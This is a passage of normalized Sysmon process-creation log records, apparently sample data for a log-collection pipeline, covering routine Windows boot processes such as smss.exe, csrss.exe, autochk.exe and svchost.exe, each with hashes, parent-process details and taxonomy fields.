"some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:16.130Z", "type": "raw", "uuid": "b4bf2f0e-8425-4798-9974-43f65dd92796"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:23.2204815Z\"},\"EventRecordID\":\"27380\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:16.128\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0010794d0000}\"},{\"Name\":\"ProcessId\",\"text\":\"460\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\smss.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1131 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Session Manager\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"smss.exe\"},{\"Name\":\"CommandLine\",\"text\":\"\\\\SystemRoot\\\\System32\\\\smss.exe 000000d8 00000084 \"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=5B61A25931437D4210EE3CBC8AE3A337B62F3DF0,MD5=38E6700BAA0E5484D2E00EC980FDD2E0,SHA256=B6E357B520478920810317B363AA539595D386BC5EF3D5CF9581F325026BA397,IMPHASH=BC32B6662261DE8469D6EB034C62A6A5\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b75f-5ea4-0000-0010622c0000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"300\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\smss.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\\SystemRoot\\\\System32\\\\smss.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "\\SystemRoot\\System32\\smss.exe 000000d8 00000084", "object.process.cwd": "C:\\Windows\\", "object.process.fullpath": "c:\\windows\\system32\\smss.exe", "object.process.guid": "747f3d96-b764-5ea4-0000-0010794d0000", "object.process.hash.imphash": "BC32B6662261DE8469D6EB034C62A6A5", 
"object.process.hash.md5": "38E6700BAA0E5484D2E00EC980FDD2E0", "object.process.hash.sha1": "5B61A25931437D4210EE3CBC8AE3A337B62F3DF0", "object.process.hash.sha256": "B6E357B520478920810317B363AA539595D386BC5EF3D5CF9581F325026BA397", "object.process.id": "460", "object.process.meta": "Description:Windows Session Manager | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "smss.exe", "object.process.original_name": "smss.exe", "object.process.parent.cmdline": "\\SystemRoot\\System32\\smss.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\smss.exe", "object.process.parent.guid": "747f3d96-b75f-5ea4-0000-0010622c0000", "object.process.parent.id": "300", "object.process.parent.name": "smss.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1131 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:16.128Z", "type": "raw", "uuid": "b510dd28-f5b7-4af7-a8f9-e8974ef379fc"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:22.6308195Z\"},\"EventRecordID\":\"27377\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:15.990\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b763-5ea4-0000-001034490000}\"},{\"Name\":\"ProcessId\",\"text\":\"396\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\csrss.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Client Server Runtime Process\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"CSRSS.Exe\"},{\"Name\":\"CommandLine\",\"text\":\"%%SystemRoot%%\\\\system32\\\\csrss.exe ObjectDirectory=\\\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=779B8AFC3FA2528B090F400EF3D592E0E2775955,MD5=7D64128BC1EECE41196858897596EBC8,SHA256=FB40ED0FFA6BC795923A941DAB6B7D6B43583D0F152A6DF4D8953D2C1A0CB417,IMPHASH=A96FA9912E09E361274AD77F1A4B252C\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b763-5ea4-0000-00106a480000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"388\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\smss.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\\SystemRoot\\\\System32\\\\smss.exe 000000cc 00000084 \"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "%%SystemRoot%%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16", 
"object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\csrss.exe", "object.process.guid": "747f3d96-b763-5ea4-0000-001034490000", "object.process.hash.imphash": "A96FA9912E09E361274AD77F1A4B252C", "object.process.hash.md5": "7D64128BC1EECE41196858897596EBC8", "object.process.hash.sha1": "779B8AFC3FA2528B090F400EF3D592E0E2775955", "object.process.hash.sha256": "FB40ED0FFA6BC795923A941DAB6B7D6B43583D0F152A6DF4D8953D2C1A0CB417", "object.process.id": "396", "object.process.meta": "Description:Client Server Runtime Process | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "csrss.exe", "object.process.original_name": "CSRSS.Exe", "object.process.parent.cmdline": "\\SystemRoot\\System32\\smss.exe 000000cc 00000084", "object.process.parent.fullpath": "c:\\windows\\system32\\smss.exe", "object.process.parent.guid": "747f3d96-b763-5ea4-0000-00106a480000", "object.process.parent.id": "388", "object.process.parent.name": "smss.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:15.990Z", "type": "raw", "uuid": "f8e8a5e5-22d3-4fba-aade-300688a9c827"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:22.5963525Z\"},\"EventRecordID\":\"27374\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:15.727\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b763-5ea4-0000-00106a480000}\"},{\"Name\":\"ProcessId\",\"text\":\"388\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\smss.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1131 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Session Manager\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"smss.exe\"},{\"Name\":\"CommandLine\",\"text\":\"\\\\SystemRoot\\\\System32\\\\smss.exe 000000cc 00000084 \"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=5B61A25931437D4210EE3CBC8AE3A337B62F3DF0,MD5=38E6700BAA0E5484D2E00EC980FDD2E0,SHA256=B6E357B520478920810317B363AA539595D386BC5EF3D5CF9581F325026BA397,IMPHASH=BC32B6662261DE8469D6EB034C62A6A5\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b75f-5ea4-0000-0010622c0000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"300\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\smss.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\\SystemRoot\\\\System32\\\\smss.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "\\SystemRoot\\System32\\smss.exe 000000cc 00000084", "object.process.cwd": "C:\\Windows\\", "object.process.fullpath": "c:\\windows\\system32\\smss.exe", "object.process.guid": "747f3d96-b763-5ea4-0000-00106a480000", "object.process.hash.imphash": "BC32B6662261DE8469D6EB034C62A6A5", 
"object.process.hash.md5": "38E6700BAA0E5484D2E00EC980FDD2E0", "object.process.hash.sha1": "5B61A25931437D4210EE3CBC8AE3A337B62F3DF0", "object.process.hash.sha256": "B6E357B520478920810317B363AA539595D386BC5EF3D5CF9581F325026BA397", "object.process.id": "388", "object.process.meta": "Description:Windows Session Manager | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "smss.exe", "object.process.original_name": "smss.exe", "object.process.parent.cmdline": "\\SystemRoot\\System32\\smss.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\smss.exe", "object.process.parent.guid": "747f3d96-b75f-5ea4-0000-0010622c0000", "object.process.parent.id": "300", "object.process.parent.name": "smss.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1131 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.505Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:15.727Z", "type": "raw", "uuid": "00dc34fa-0bb8-4eab-a156-1aba61290441"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:22.3127414Z\"},\"EventRecordID\":\"27373\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:14.321\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b762-5ea4-0000-00108b3c0000}\"},{\"Name\":\"ProcessId\",\"text\":\"328\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\autochk.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Auto Check Utility\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"AutoChk.Exe\"},{\"Name\":\"CommandLine\",\"text\":\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\autochk.exe *\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=2E6C38958917FB86F09026D41337C7460EFBE5F5,MD5=990D01F2A6D10A33C382191A24BBAAAF,SHA256=644417B839762A3325920A87C3D955CA974A4EC1D6F008216910267435921255,IMPHASH=262DAC4DB20D08B06C59A7F5DBE43E61\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b75f-5ea4-0000-0010622c0000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"300\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\smss.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\\SystemRoot\\\\System32\\\\smss.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "\\??\\C:\\Windows\\system32\\autochk.exe *", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\autochk.exe", "object.process.guid": "747f3d96-b762-5ea4-0000-00108b3c0000", "object.process.hash.imphash": 
"262DAC4DB20D08B06C59A7F5DBE43E61", "object.process.hash.md5": "990D01F2A6D10A33C382191A24BBAAAF", "object.process.hash.sha1": "2E6C38958917FB86F09026D41337C7460EFBE5F5", "object.process.hash.sha256": "644417B839762A3325920A87C3D955CA974A4EC1D6F008216910267435921255", "object.process.id": "328", "object.process.meta": "Description:Auto Check Utility | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "autochk.exe", "object.process.original_name": "AutoChk.Exe", "object.process.parent.cmdline": "\\SystemRoot\\System32\\smss.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\smss.exe", "object.process.parent.guid": "747f3d96-b75f-5ea4-0000-0010622c0000", "object.process.parent.id": "300", "object.process.parent.name": "smss.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.505Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:14.321Z", "type": "raw", "uuid": "27343a77-5820-42f9-b0e2-fec9534fd272"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:20.1345606Z\"},\"EventRecordID\":\"27372\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:11.037\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b75f-5ea4-0000-0010622c0000}\"},{\"Name\":\"ProcessId\",\"text\":\"300\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\smss.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1131 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Session Manager\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"smss.exe\"},{\"Name\":\"CommandLine\",\"text\":\"\\\\SystemRoot\\\\System32\\\\smss.exe\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=5B61A25931437D4210EE3CBC8AE3A337B62F3DF0,MD5=38E6700BAA0E5484D2E00EC980FDD2E0,SHA256=B6E357B520478920810317B363AA539595D386BC5EF3D5CF9581F325026BA397,IMPHASH=BC32B6662261DE8469D6EB034C62A6A5\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b75f-5ea4-0000-0010eb030000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"4\"},{\"Name\":\"ParentImage\",\"text\":\"System\"},{\"Name\":\"ParentCommandLine\",\"text\":\"?\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "\\SystemRoot\\System32\\smss.exe", "object.process.cwd": "C:\\Windows", "object.process.fullpath": "c:\\windows\\system32\\smss.exe", "object.process.guid": "747f3d96-b75f-5ea4-0000-0010622c0000", "object.process.hash.imphash": "BC32B6662261DE8469D6EB034C62A6A5", "object.process.hash.md5": "38E6700BAA0E5484D2E00EC980FDD2E0", "object.process.hash.sha1": 
"5B61A25931437D4210EE3CBC8AE3A337B62F3DF0", "object.process.hash.sha256": "B6E357B520478920810317B363AA539595D386BC5EF3D5CF9581F325026BA397", "object.process.id": "300", "object.process.meta": "Description:Windows Session Manager | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "smss.exe", "object.process.original_name": "smss.exe", "object.process.parent.cmdline": "?", "object.process.parent.fullpath": "system", "object.process.parent.guid": "747f3d96-b75f-5ea4-0000-0010eb030000", "object.process.parent.id": "4", "object.process.parent.name": "system", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1131 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.505Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:11.037Z", "type": "raw", "uuid": "a48bd392-d33d-46d2-b6db-1ec152ae9b00"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:02.0572010Z\"},\"EventRecordID\":\"27334\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2752\",\"ThreadID\":\"3576\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:01.724\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b755-5ea4-0000-0010d06e2500}\"},{\"Name\":\"ProcessId\",\"text\":\"4484\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s gpsvc\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-3384-5ea5-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{00000000-0000-0000-0000-000000000000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"596\"},{\"Name\":\"ParentImage\",\"text\":\"?\"},{\"Name\":\"ParentCommandLine\",\"text\":\"?\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-3384-5ea5-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", 